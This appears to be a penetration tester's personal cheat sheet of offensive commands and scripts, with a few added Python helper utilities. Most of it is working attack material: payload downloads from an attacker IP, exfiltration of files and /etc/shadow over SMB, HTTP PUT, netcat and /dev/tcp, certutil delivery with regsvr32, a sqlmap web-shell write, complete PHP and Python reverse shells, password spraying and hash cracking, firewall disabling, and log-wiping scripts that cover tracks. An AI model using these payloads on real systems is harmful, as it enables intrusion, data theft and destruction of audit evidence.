If I use it and it's not here, it's probably over here: https://github.com/burmat/burmatscripts
If you have remote command execution on a box with Python, something like this should do the trick (this is Python 2: urllib.URLopener does not exist in Python 3, where urllib.request.urlretrieve does the same job):
python -c "import urllib; f = urllib.URLopener(); f.retrieve('http://<attacker ip>/meterpreter', '/tmp/meterpreter');"
or if it is a Windows box, it's not much different:
C:\Python2.7\python.exe -c "import urllib; f = urllib.URLopener(); f.retrieve('http://<attacker ip>/rs_powershell.exe', '/temp/rs_powershell.exe');"
I got stuck with a borked up reverse shell on a Windows system with no file transfer methods and no modern scripting options. I scraped together the following one-liner to dump into my shell to get my payload over by writing a VBS script with echo statements to issue the download:
echo Set o=CreateObject^("MSXML2.XMLHTTP"^):Set a=CreateObject^("ADODB.Stream"^):Set f=Createobject^("Scripting.FileSystemObject"^):o.open "GET", "http://<attacker ip>/meterpreter.exe", 0:o.send^(^):If o.Status=200 Then > "C:\temp\download.vbs" &echo a.Open:a.Type=1:a.Write o.ResponseBody:a.Position=0:If f.Fileexists^("C:\temp\meterpreter.exe"^) Then f.DeleteFile "C:\temp\meterpreter.exe" >> "C:\temp\download.vbs" &echo a.SaveToFile "C:\temp\meterpreter.exe" >>"C:\temp\download.vbs" &echo End if >>"C:\temp\download.vbs" &cscript //B "C:\temp\download.vbs" &del /F /Q "C:\temp\download.vbs"
(originally sourced from here: http://karceh.blogspot.com/2011/06/vbs-download-file-from-internet.html)
As always, the impacket suite shines. Use smbserver.py to open an SMB server on your host for file exfiltration (add -smb2support for current Windows targets, which ship with SMB1 disabled and will otherwise refuse to mount the share):
./smbserver.py burmat_exfil ./loot -username burmat -password burmat

## from the target:
PS C:\> net use Q: \\10.1.1.123\burmat_exfil /user:burmat burmat
PS C:\> mv .\bh.zip Q:\bh.zip
PS C:\> net use Q: /delete
Perl is on more boxes than you'd expect, and File::Fetch has been a core module since 5.10 (the file lands in the current directory):
perl -e 'use File::Fetch; my $ff=File::Fetch->new(uri => "http://10.10.10.11/exploit.sh"); my $file = $ff->fetch() or die $ff->error;'
Picked up from here (thanks @ippsec), you can start an nginx server that accepts PUT requests for file transfer via HTTP. It needs an nginx built with ngx_http_dav_module, and /var/www/upload/ has to be writable by the nginx worker user (www-data on Debian/Kali) or every PUT will fail:
❯ cat /etc/nginx/sites-enabled/file_upload
server {
    listen 8001 default_server;
    server_name burmat.co;
    location / {
        root /var/www/upload/;
        dav_methods PUT;
    }
}
❯ service nginx start
Issue a PUT request from a remote system to upload files to /var/www/upload on your system. Send the file as the raw request body (curl --data-binary or -T, Invoke-RestMethod -InFile): nginx writes the body to disk verbatim, so a multipart upload (curl -F) would land with the multipart boundaries still wrapped around it:
## CURL:
❯ curl -X PUT http://192.168.1.87:8001/l00t.txt --data-binary @/home/user/l00t.txt
## POWERSHELL
PS C:\Users\victim> Invoke-RestMethod -Method PUT -Uri "http://10.10.14.12:8001/l00t.txt" -InFile l00t.txt
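An added example, not from the original page or ippsec's notes: the receiving side written with Python's standard library, for when nginx isn't available, plus the check the nginx config above does not do, refusing any PUT whose path resolves outside the upload directory. put_file() is the client half and sends the same raw body that the curl line does. Host, port, file names and the payload bytes are constructed for the demo.

```python
import os
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit
import http.client


def safe_target(root, url_path):
    """Map a request path onto root; return None if it would escape root."""
    rel = unquote(urlsplit(url_path).path).lstrip("/")
    if not rel or rel.endswith("/"):
        return None
    root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root, rel))
    # realpath has resolved any '..' or symlink; the result must still sit under root
    if os.path.commonpath([root, target]) != root:
        return None
    return target


class PutHandler(BaseHTTPRequestHandler):
    upload_root = None  # set by start_server()

    def do_PUT(self):
        # consume the body first so a rejected request still gets a clean response
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        target = safe_target(self.upload_root, self.path)
        if target is None:
            self.send_error(400, "path escapes upload root")
            return
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with open(target, "wb") as fh:
            fh.write(body)
        self.send_response(201)
        self.end_headers()

    def log_message(self, fmt, *args):  # keep the console quiet
        pass


def start_server(upload_root, port=0):
    """Serve on a background thread; port 0 picks a free one. Returns (server, port)."""
    PutHandler.upload_root = upload_root
    srv = HTTPServer(("127.0.0.1", port), PutHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def put_file(host, port, remote_name, data):
    """Client side: a raw-body PUT, the same thing curl --data-binary @file sends."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("PUT", "/" + remote_name, body=data)
    status = conn.getresponse().status
    conn.close()
    return status


def demo():
    """Stand the receiver up on loopback, push one file, then try a traversal."""
    import tempfile
    root = tempfile.mkdtemp()  # constructed upload directory
    srv, port = start_server(root)
    try:
        ok = put_file("127.0.0.1", port, "l00t.txt", b"constructed sample\n")
        bad = put_file("127.0.0.1", port, "../escape.txt", b"x")
        with open(os.path.join(root, "l00t.txt"), "rb") as fh:
            stored = fh.read()
        escaped = os.path.exists(os.path.join(os.path.dirname(root), "escape.txt"))
    finally:
        srv.shutdown()
        srv.server_close()
    return ok, bad, stored, escaped


if __name__ == "__main__":
    print(demo())  # (201, 400, b'constructed sample\n', False)
```

Bind to your VPN address instead of 127.0.0.1 when using it for real; the traversal guard matters because the client is the compromised host, and anything that can reach the listener can name any path it likes.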
Because if Netcat is on the system, everything becomes easier:
listener#> nc -l -p 4444 > output.file
sender#> nc -w 3 [destination] 4444 < input.file
(and if it's not, go get it, assuming the box has the optional Windows tftp client installed: C:\Users\burmat>tftp -i 10.10.10.10 get nc.exe)
Using certutil.exe is a clever way to get files down to a victim if you are attacking a Windows box and limited on methods:
certutil.exe -urlcache -split -f http://10.10.15.11/burmat.exe C:\temp\burmat.exe
It will also decode a file from Base64 text, which is how you get a binary across a text-only shell; regsvr32 then loads the resulting DLL (/u calls its DllUnregisterServer export):
certutil.exe -decode C:\temp\payload.txt C:\temp\payload.dll
regsvr32 /s /u C:\temp\payload.dll
(Source: http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html )
If you have SQLi with a user account that has FILE privileges, you can use sqlmap to write a file to disk without formulating an INTO OUTFILE / INTO DUMPFILE query yourself. On MySQL 5.7+ also check @@secure_file_priv: if it names a directory, writes are confined to it, and if it is NULL, file writes are disabled entirely regardless of FILE:
❯ sqlmap -r inject.req --dbms "mysql" --file-write shell.php --file-dest \\inetpub\\wwwroot\\shell.php
To see if you have the privilege, attempt (you might not have rights) to dump the user table; sqlmap's --privileges switch is the fallback when mysql.user isn't readable:
❯ sqlmap -r inj.req --dbms "mysql" -D mysql -T user -C User,File_priv --dump
.. SNIP ..
[2 entries]
+--------+-----------+
| User   | File_priv |
+--------+-----------+
| burmat | Y         |
| root   | Y         |
+--------+-----------+
This is a clever way to get XML over to the system using copy and paste, and writing that XML to file (the closing "@ of the here-string has to be at the start of its own line):
PS C:\> $console = [XML] @"
<XML CODE HERE>
"@
# write the xml to file:
PS C:\> $console.save("C:\users\burmat\documents\console.xml")
Base64 over a raw TCP socket, using bash's /dev/tcp so the sender needs no netcat:
# receiving host
nc -lp 4443 | base64 -d > loot.txt
# sender host
base64 /etc/shadow > /dev/tcp/10.10.10.123/4443
## encode from file with (-w 0 disables line wrapping, so the output is one pasteable line):
base64 -w 0 shell.py
## decode to file with:
echo -n "ZmlsZSBjb250ZW50IGhlcmUK" | base64 -d > shell.py
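An added example, not from the original page: the same base64 copy/paste transfer with an integrity check bolted on. pack() prefixes the base64 with the file's sha256 and wraps it to terminal width; unpack() strips whatever whitespace the clipboard or terminal added and refuses the data if the digest no longer matches, which is what tells you a paste was truncated or mangled before you run it. The sample payload in the usage section is constructed.

```python
import base64
import hashlib


def pack(data, width=76):
    """Text to paste: a 'sha256:<hex>' header line, then base64 in `width`-char lines."""
    digest = hashlib.sha256(data).hexdigest()
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + width] for i in range(0, len(b64), width)]
    return "sha256:" + digest + "\n" + "\n".join(lines) + "\n"


def unpack(text):
    """Reverse pack(); raise ValueError if anything was dropped or altered in transit."""
    header, _, body = text.partition("\n")
    if not header.startswith("sha256:"):
        raise ValueError("missing sha256 header")
    clean = "".join(body.split())           # undo terminal wrapping / pasted whitespace
    data = base64.b64decode(clean, validate=True)   # binascii.Error is a ValueError
    if hashlib.sha256(data).hexdigest() != header[len("sha256:"):]:
        raise ValueError("sha256 mismatch: the transfer is corrupt")
    return data


def is_valid(text):
    """True if text unpacks cleanly with a matching digest."""
    try:
        unpack(text)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    sample = b"#!/bin/sh\necho constructed sample payload\n"   # constructed input
    blob = pack(sample)
    print(blob)                          # paste this into the target shell
    print(unpack(blob) == sample)        # True on the receiving side
    print(is_valid(blob[:-5]))           # False: a truncated paste is caught
```

On the target side the equivalent of unpack() is the page's own base64 -d followed by sha256sum; the point of carrying the digest in the header is that you don't have to remember it.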
Not a true method of file transfer, but useful nonetheless (copies the script into the clipboard so it can be pasted straight into an RDP or VNC session):
cat /usr/share/nishang/Client/Out-HTA.ps1 | xclip -sel clip
A trimmed pentestmonkey PHP reverse shell; set $ip and $port to your listener:
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = "10.10.10.10";
$port = 8080;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = "uname -a; w; id; /bin/bash -i";
$daemon = 0;
$debug = 0;

// background ourselves if the process-control extension is available
if (function_exists("pcntl_fork")) {
    $pid = pcntl_fork();
    if ($pid == -1) { exit(1); }
    if ($pid) { exit(0); }
    if (posix_setsid() == -1) { exit(1); }
    $daemon = 1;
}
chdir("/");
umask(0);

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) { exit(1); }

$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => array("pipe", "w"),
    2 => array("pipe", "w")
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) { exit(1); }

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

// shovel bytes between the socket and the shell's stdin/stdout/stderr
while (1) {
    if (feof($sock)) { break; }
    if (feof($pipes[1])) { break; }
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    if (in_array($sock, $read_a)) {
        $input = fread($sock, $chunk_size);
        fwrite($pipes[0], $input);
    }
    if (in_array($pipes[1], $read_a)) {
        $input = fread($pipes[1], $chunk_size);
        fwrite($sock, $input);
    }
    if (in_array($pipes[2], $read_a)) {
        $input = fread($pipes[2], $chunk_size);
        fwrite($sock, $input);
    }
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
?>
(originally sourced from: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php)
A Python reverse shell for Windows (spawns cmd.exe; point it at your listener; runs under Python 2 or 3):
import os, socket, subprocess, threading

def s2p(s, p):
    # socket -> process stdin
    while True:
        data = s.recv(1024)
        if not data:          # listener went away
            break
        p.stdin.write(data)
        p.stdin.flush()

def p2s(s, p):
    # process stdout -> socket, one byte at a time so prompts arrive promptly
    while True:
        s.send(p.stdout.read(1))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.11.0.37", 4444))
p = subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()
An interactive WinRM client in Ruby (gem install winrm) for when you have credentials and 5985/5986 is reachable; it runs each line you type as PowerShell on the target:
require 'winrm'

conn = WinRM::Connection.new(
  endpoint: 'https://IP:PORT/wsman',
  transport: :ssl,
  user: 'username',
  password: 'password',
  :no_ssl_peer_verification => true
)

command = ""
conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    print "PS > "
    command = gets
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end
(originally sourced from: https://github.com/WinRb/WinRM)
This one is pretty dirty, and pretty awesome. Run a one-liner on your victim to generate a list of packages (rpm or dpkg) on the machine (/tmp/packages.txt). Copy this file to one that has searchsploit, and run the script.
Generate the file with (it detects rpm vs dpkg and appends the running kernel version as a package line):
FILE="packages.txt"; FILEPATH="/tmp/$FILE"; /usr/bin/rpm -q -f /usr/bin/rpm >/dev/null 2>&1; if [ $? -eq 0 ]; then rpm -qa --qf "%{NAME} %{VERSION}\n" | sort -u > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; else dpkg -l | grep '^ii' | awk '{print $2 " " $3}' > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; fi; echo ""; echo "[>] Done. Transfer $FILEPATH to your computer and run: "; echo ""; echo "./packages_compare.sh /path/to/$FILE"; echo "";
Run the following script: https://github.com/burmat/burmatscripts/blob/master/bash/pkg_lookup.sh
(thanks to chryzsh for doing the heavy lifting)
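An added example, not the page's pkg_lookup.sh: a parser for the packages.txt the one-liner above produces. Package versions carry distro noise (epoch, Debian revision, kernel flavour) that searchsploit's title matching will never find, so each line is reduced to a product name plus upstream major.minor before being turned into a searchsploit -t query. SAMPLE is a constructed packages.txt, and the name/version cleanup rules are this example's own assumptions, not searchsploit's.

```python
import re
import shlex

# Constructed sample in the "name version" shape the one-liner writes:
# dpkg-style versions with epochs, revisions and an arch qualifier, plus the kernel line.
SAMPLE = """\
openssh-server 1:7.6p1-4ubuntu0.3
sudo 1.8.21p2-3ubuntu1.2
libssl1.1:amd64 1.1.1-1ubuntu2.1
exim4 4.90.1-1ubuntu1.8
libc6 2.27-3ubuntu1.4
kernel 4.15.0-112-generic
"""


def clean_version(raw):
    """Drop the epoch ('1:'), the distro revision ('-3ubuntu1.2', '-112-generic')
    and anything after major.minor; return None if no number is left."""
    v = raw.split(":", 1)[1] if ":" in raw else raw
    v = v.split("-", 1)[0]
    m = re.match(r"(\d+)(?:\.(\d+))?", v)
    if not m:
        return None
    return m.group(1) + ("." + m.group(2) if m.group(2) else "")


def clean_name(name):
    """Package name -> product name: strip the dpkg arch qualifier and role suffixes
    (assumed mapping; exploit titles say 'OpenSSH', not 'openssh-server')."""
    name = name.split(":", 1)[0]
    for suffix in ("-server", "-client", "-common", "-bin", "-dev"):
        if name.endswith(suffix):
            return name[: -len(suffix)]
    return name


def parse_packages(text):
    """Return [(product, major.minor), ...] from packages.txt; junk lines are skipped."""
    out = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        ver = clean_version(parts[1])
        if ver is not None:
            out.append((clean_name(parts[0]), ver))
    return out


def searchsploit_commands(text):
    """One title-only searchsploit query per package, shell-quoted for pasting."""
    return ["searchsploit -t %s" % shlex.quote("%s %s" % (name, ver))
            for name, ver in parse_packages(text)]


if __name__ == "__main__":
    for cmd in searchsploit_commands(SAMPLE):
        print(cmd)   # e.g. searchsploit -t 'openssh 7.6'
```

Trimming to major.minor is deliberate: an exploit titled for 7.x will not match a search for 7.6p1, and the false positives it produces are cheap to discard by hand.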
One of the handiest scripts to find running jobs and processes in real time. Thanks to IppSec for sharing it with the world:
#!/bin/bash
# print process command lines that appear (>) or disappear (<) between one-second snapshots
IFS=$'\n'
old_process=$(ps -eo command)
while true; do
    new_process=$(ps -eo command)
    diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
    sleep 1
    old_process=$new_process
done
I don't remember where I got this, but incredibly useful to focus in on key info from an snmpwalk prior to sifting through all of it (targets come from targets.txt, one IP at the start of each line, output goes under ~/Documents/labs/$ip/scans/):
#!/bin/bash
for ip in $(cat ~/Documents/labs/targets.txt | awk '/^[0-9]/ {print $1}'); do
    mkdir -p ~/Documents/labs/$ip/scans
    echo "Performing snmpwalk on public tree for" $ip " - Checking for System Processes"
    snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.1.6.0 > ~/Documents/labs/$ip/scans/systemprocesses.txt
    echo "Performing snmpwalk on public tree for" $ip " - Checking for Running Programs"
    snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.2 > ~/Documents/labs/$ip/scans/runningprograms.txt
    echo "Performing snmpwalk on public tree for" $ip " - Checking for Processes Path"
    snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.4 > ~/Documents/labs/$ip/scans/processespath.txt
    echo "Performing snmpwalk on public tree for" $ip " - Checking for Storage Units"
    snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.2.3.1.4 > ~/Documents/labs/$ip/scans/storageunits.txt
    echo "Performing snmpwalk on public tree for" $ip " - Checking for Software Name"
    snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.6.3.1.2 > ~/Documents/labs/$ip/scans/softwarename.txt
    echo "Performing snmpwalk on public tree for" $ip " - Checking for User Accounts"
    snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25 > ~/Documents/labs/$ip/scans/useraccounts.txt
    echo "Performing snmpwalk on public tree for" $ip " - Checking for TCP Local Ports"
    snmpwalk -c public -v1 $ip 1.3.6.1.2.1.6.13.1.3 > ~/Documents/labs/$ip/scans/tcplocalports.txt
    echo "Performing snmp-check scan for" $ip
    snmp-check $ip > ~/Documents/labs/$ip/scans/snmpcheck.txt
    echo "Cleaning up empty files..."
    find ~/Documents/labs/$ip/scans/ -size 0 -print0 | xargs -0 rm
done
You can use a regular-old for loop:
for i in {1..254}; do ping -c 1 -W 1 172.1.1.$i | grep 'from'; done
Or you can try out the following python script:
#!/usr/bin/python
import multiprocessing, subprocess, os

def pinger(job_q, results_q):
    # each worker pulls addresses off the queue until it sees the None sentinel
    DEVNULL = open(os.devnull, 'w')
    while True:
        ip = job_q.get()
        if ip is None:
            break
        try:
            # -W 1: give up after one second instead of ping's default wait
            subprocess.check_call(['ping', '-c1', '-W1', ip], stdout=DEVNULL)
            results_q.put(ip)
        except subprocess.CalledProcessError:
            pass    # no reply

if __name__ == '__main__':
    pool_size = 255
    jobs = multiprocessing.Queue()
    results = multiprocessing.Queue()
    pool = [multiprocessing.Process(target=pinger, args=(jobs, results)) for i in range(pool_size)]
    for p in pool:
        p.start()
    for i in range(1, 255):
        jobs.put('10.120.15.{0}'.format(i))
    for p in pool:
        jobs.put(None)
    for p in pool:
        p.join()
    while not results.empty():
        ip = results.get()
        print(ip)
Not the fastest or the cleanest, but it's an easy way to generate a ping scan from a cmd prompt:
FOR /L %i IN (1,1,254) DO ping -n 1 192.168.1.%i | FIND /i "Reply" >> ips.txt
Enable RDP from an elevated PowerShell prompt (allow connections, require NLA, open the firewall group):
PS > Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -Value 0
PS > Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -Value 1
PS > Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
If you need to add your user to the group, you can use: NET LOCALGROUP "Remote Desktop Users" domain\user /ADD. And if you need to disable the firewall altogether: NetSh Advfirewall set allprofiles state off
Use exrex [https://github.com/asciimoo/exrex] to generate custom wordlists to password spray with (note that exrex expands every branch literally, so a pattern that lists Winter twice, like the one below, emits duplicate candidates; pipe through sort -u before spraying so you don't burn lockout attempts on repeats):
python exrex.py "(Spring|Winter|Autumn|Fall|Summer|Winter)(20)1[78]!"
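An added example, not the page's or exrex's code: a small expander for the subset of regex that spray patterns actually use, so the expansion logic is visible rather than hidden in a library call. It supports literals, backslash escapes, (a|b|c) groups (nestable), [x-y] character classes and a trailing ? on any of those; output is de-duplicated in first-seen order, which matters for the pattern above with its repeated Winter branch.

```python
def expand(pattern):
    """Return every string the pattern can match, first-seen order, no duplicates."""
    words, pos = _alternation(pattern, 0)
    if pos != len(pattern):
        raise ValueError("unbalanced ')' at offset %d" % pos)
    return list(dict.fromkeys(words))


def _alternation(p, i):
    """a|b|c : union of each branch, until ')' or the end of the pattern."""
    words = []
    while True:
        branch, i = _concat(p, i)
        words.extend(branch)
        if i < len(p) and p[i] == "|":
            i += 1
            continue
        return words, i


def _concat(p, i):
    """A run of atoms: cartesian product of their expansions."""
    words = [""]
    while i < len(p) and p[i] not in "|)":
        atoms, i = _atom(p, i)
        if i < len(p) and p[i] == "?":       # optional: allow the empty string too
            atoms = [""] + atoms
            i += 1
        words = [w + a for w in words for a in atoms]
    return words, i


def _atom(p, i):
    """One group, class, escaped char or literal; returns (expansions, next index)."""
    c = p[i]
    if c == "(":
        inner, i = _alternation(p, i + 1)
        if i >= len(p) or p[i] != ")":
            raise ValueError("missing ')'")
        return inner, i + 1
    if c == "[":
        end = p.index("]", i + 1)
        chars, k = [], i + 1
        while k < end:
            if k + 2 < end and p[k + 1] == "-":       # range such as 7-9
                chars.extend(chr(x) for x in range(ord(p[k]), ord(p[k + 2]) + 1))
                k += 3
            else:
                chars.append(p[k])
                k += 1
        return chars, end + 1
    if c == "\\":
        return [p[i + 1]], i + 2
    return [c], i + 1


if __name__ == "__main__":
    # the page's own pattern: 6 branches x 2 years = 12 expansions, 10 once de-duplicated
    for w in expand("(Spring|Winter|Autumn|Fall|Summer|Winter)(20)1[78]!"):
        print(w)
```

Counting the output before spraying is the useful habit here: the product of the branch counts tells you exactly how many attempts per account the list costs against a lockout threshold.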
I got hit with having to crack mscachev2 hashes which can be slow. This is a perfect time to instead try targeted (small) wordlists and instead pass in some tried-and-tested rules:
hashcat64.exe -a 0 -m 2100 -r rules/d3adhob0.rule mscachev2hash.txt wordlist.txt -o cracked.txt
Cleaning up after yourself on an older sysvinit/syslogd box (truncates the logs rather than deleting them, so the daemons keep their file handles):
#!/bin/sh
/etc/init.d/sysklogd stop
VARLOGS="auth.log boot btmp daemon.log debug dmesg kern.log mail.info mail.log mail.warn messages syslog udev wtmp"
cd /var/log
for ii in $VARLOGS; do
    echo -n > $ii
    rm -f $ii.? $ii.?.gz
done
/etc/init.d/samba stop
rm -f /var/log/samba/*
rm -f /var/lib/dhcp3/*
for ii in /var/log/proftpd/* /var/log/postgresql/* /var/log/apache2/*; do
    echo -n > $ii
done
A blunter version. Source it (. ./cover.sh) rather than executing it: history -c only clears the history of the shell it runs in, and bash will write ~/.bash_history back out from memory when your interactive shell exits unless HISTFILE is unset in that shell:
#!/bin/bash
echo "COVERING TRACKS"
echo "clearing /var/log/auth.log"
echo "" > /var/log/auth.log
echo "clearing ~/.bash_history"
echo "" > ~/.bash_history
echo "clearing /root/.bash_history"
echo "" > /root/.bash_history
echo "removing ~/.bash_history"
rm ~/.bash_history -rf
echo "removing /tmp/"
rm -R /tmp/*
echo "clearing /var/log/messages"
echo "" > /var/log/messages
echo "clearing command history"
history -c